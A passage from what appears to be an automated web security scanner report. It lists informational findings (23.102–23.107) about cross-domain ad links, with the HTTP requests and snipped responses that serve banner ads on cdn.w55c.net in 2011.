Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:54 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:22:04 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1172

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5315.158901.DATAXU/B5334493.10;abr=!ie;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N5315.158901.DATAXU/B5334493.10;abr=!ie4;abr=!ie5;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2?">
<IMG SRC="http://ad.doubleclick.net/ad/N5315.158901.DATAXU/B5334493.10;abr=!ie4;abr=!ie5;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

23.102. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RHDjk2rJk_401783982.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676654&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658654961&bpp=7&shv=r20110420&jsv=r20110415&correlator=1303658654970&frm=1&adk=513358139&ga_vid=37961730.1303658655&ga_sid=1303658655&ga_hid=329915175&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=36813006%2C33895132&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:08:39 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:55:16 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 2684

<iframe src="http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="#000000"> <a href="http://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]">
<img src="http://altfarm.mediaplex.com/ad/!bn/14302-119028-29115-1?mpt=[CACHEBUSTER]"
alt="Click Here" border="0">
</a>
...[SNIP]...

23.103. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RNYnkg2EM_1392081529.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTl8R0ZqRXJKdHl0MHwxMzAzNjU4NDIxODU1fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUwMTk3&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_swAMWpIK5YMIH2txmb8GB__on5K2_4iSvA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTk&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=150&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676422&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658422794&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658422802&frm=1&adk=2614322350&ga_vid=1769074993.1303658423&ga_sid=1303658423&ga_hid=1301346497&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:21 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:56 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:30 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 420

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=160 height=600 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="#000000"> <a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]">
<img src="http://altfarm.mediaplex.com/ad/!bn/3992-125865-29115-1?mpt=[CACHEBUSTER]"
alt="Click Here" border="0">
</a>
...[SNIP]...

23.104. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:14 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3553

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5762.158901.DATAXU/B4799014.12;abr=!ie;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N5762.158901.DATAXU/B4799014.12;abr=!ie4;abr=!ie5;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ?">
<IMG SRC="http://ad.doubleclick.net/ad/N5762.158901.DATAXU/B4799014.12;abr=!ie4;abr=!ie5;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Click Here"></A>
...[SNIP]...

23.105. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:18 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Date: Sun, 24 Apr 2011 15:24:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1246

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3016.158901.DATAXU/B5398270.22;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N3016.158901.DATAXU/B5398270.22;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4?">
<IMG SRC="http://ad.doubleclick.net/ad/N3016.158901.DATAXU/B5398270.22;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

23.106. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:20 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:50:11 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4637.158901.6939390485621/B5385253.8;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4637.158901.6939390485621/B5385253.8;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ?">
<IMG SRC="http://ad.doubleclick.net/ad/N4637.158901.6939390485621/B5385253.8;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.107. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
